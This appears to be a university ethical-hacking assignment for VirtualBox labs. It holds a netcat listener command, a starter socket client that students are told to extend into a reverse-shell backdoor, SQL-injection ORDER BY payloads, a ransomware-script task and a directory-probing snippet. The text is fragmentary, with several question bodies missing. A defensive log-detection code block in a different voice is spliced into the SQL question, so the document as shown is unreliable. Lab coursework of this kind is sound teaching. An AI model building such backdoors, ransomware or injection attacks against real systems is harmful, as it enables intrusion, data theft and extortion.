Assignment CSCI369 SPR 2022 WG
Assignment
Due: 11:55 pm (Sydney Time) 28 October 2022
Total Mark: 100 (30% of Final Mark)
- You must create a folder (directory) for each question. – You will need to
create seven folders named as Q1,…,Q5.
- Answers for each question (which can be essays) need to be saved in each
folder.
- You need to have VirtualBox installed on your personal laptop or
desktop. In VirtualBox, you need to install at least the Kali, Ubuntu and
Metasploitable2 virtual machines.
- You will have to take several screenshots of the results if asked. Those
screenshots will be checked thoroughly using hash checksums. If files
submitted by two different students produce the same checksum, all of
those students will get zero marks for the assignment.
Important note: You should submit your Python source code with readme files
(explaining how to run your program). Not doing so could result in a reduction
in the marks.
a) On your Kali machine, you (as a hacker) will run netcat to wait for
incoming traffic. That is, you run nc -v -l -p 5555 on the terminal.
(This means you don’t have to write a server program.)
b) The backdoor Trojan is, then, a client Python program that will
connect to your Kali machine waiting for the connection.
CSCI369 Ethical Hacking
This material is copyrighted. It must not be distributed without permission from
Joonsang Baek
d) You should start with the following Python code, which is a client
program based on the Python socket package
(https://docs.python.org/3/howto/sockets.html). The code given
below just connects to the server, then receives and displays a line of text
entered by the server's user.
You should modify this code so that Linux commands you type will be
sent to the victim’s Ubuntu machine, executed there, and the result
will be sent back to your Kali machine.
import socket

kali_ip = "10.0.2.15"  # This IP can be different on your virtual box
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((kali_ip, 5555))
# encode() is needed to convert your string input to bytes to be
# transferred over the network
s.send("Connected!\n".encode())
# decode() is needed to convert your byte result to a string to be displayed
received_data = s.recv(1024).decode()
print(received_data)
s.close()
Hint: Save the above code. On your Kali machine, run the netcat (nc) command
described above. On the Ubuntu machine, run the above code and see what
happens.
Submit your Python source code named “backdoor.py” and readme.txt file
that explains how to run your program.
In the series of our labs, we learnt how to create a reverse shell for a
Windows machine. (We used msfvenom to generate a backdoor and
exploit it using Metasploit, creating a reverse shell.) It is harder to create a
reverse shell for Linux, but it is not impossible. Your task is to refer to the
following web article and create a reverse shell for Ubuntu (Linux) VM.
https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
You can use other graphic file formats, but make sure that the images are
clearly visible. Save all your files in the folder Q2.
a) In the input field of User ID, type ' order by 1 #. You will not get
any error. This means there is at least one column in the database.
Instead of 1, try any other number, say 10 (i.e., ' order by 10 #).
You will get an error this time. This means 10 is larger than the
number of columns. Keep trying this way to find out the exact number
of columns. How many columns are there? Your answer needs to be
saved in Q3-a.txt. (3 marks)
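From the defender's side, the probing sequence in a) leaves a recognisable trail in web server logs. The following added example (not part of the assignment's own code) flags clients that try several ORDER BY column indexes; the log lines, the /app/ path and the id parameter name are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed (client IP, request URL) pairs; not taken from a real system.
SAMPLE_LOG = [
    ("10.0.2.15", "/app/?id=1&Submit=Submit"),
    ("10.0.2.15", "/app/?id=%27+order+by+1+%23&Submit=Submit"),
    ("10.0.2.15", "/app/?id=%27+order+by+10+%23&Submit=Submit"),
    ("10.0.2.15", "/app/?id=%27%20ORDER%20BY%203%20%23&Submit=Submit"),
    ("10.0.2.7", "/shop/?sort=order+by+price"),
    ("10.0.2.7", "/app/?id=2&Submit=Submit"),
]

# A quote that closes the string literal, ORDER BY <number>, then a comment
# marker (# or --) that cuts off the rest of the original statement.
PROBE = re.compile(r"'\s*order\s+by\s+(\d+)\s*(?:#|--)", re.IGNORECASE)


def probed_columns(url):
    """Return the column indexes probed by any query parameter in the URL."""
    hits = []
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits += [int(n) for n in PROBE.findall(value)]
    return hits


def find_enumeration(log, min_distinct=2):
    """Map client IP -> sorted distinct indexes, for clients with >= min_distinct."""
    seen = defaultdict(set)
    for ip, url in log:
        seen[ip].update(probed_columns(url))
    return {ip: sorted(cols) for ip, cols in seen.items() if len(cols) >= min_distinct}


if __name__ == "__main__":
    for ip, cols in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: ORDER BY column-count probing, indexes tried {cols}")
```

A single hit can be a false positive, so the function only reports clients that tried at least two distinct indexes.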
You can use other graphic file formats, but make sure that the images are
clearly visible. Save all your files in the folder Q3.
Write a Python program that does the above steps. Name your script
ransom and save it together with your public key (the attacker’s public
key) in the folder Q4.
Submit your Python source code and a readme file which explains how to
run your program.
Note 1: In step 2), you do not have to extract the key from key.txt. When
GPG asks for a key for symmetric encryption, you can enter the same key you
have saved in key.txt.
Note 2: As this is (going to be) malware, you do not need to think about
the sanitization of the Linux commands. (Refer to Task 2 in Lab5.)
import requests
meta_ip ="10.0.2.4" #Your Metasploitable’s IP can be different
target_website = "http://"+meta_ip+"/mutillidae"
directory="documentation" #This is an example
# directory="addnews"
url = target_website+"/"+directory
response = requests.get(url)
print(response)
Submit your Python source code and a readme file which explains how to
run your program.
How to submit
Put your folders Q1,…,Q5 into one folder named with your surname followed by your
UOW student number, e.g. Greg5284611. Then, compress this folder to make one
zip file. Note that only zip format will be accepted and other formats may result
in zero marks for your assignment. Submit your (zip) file through Moodle.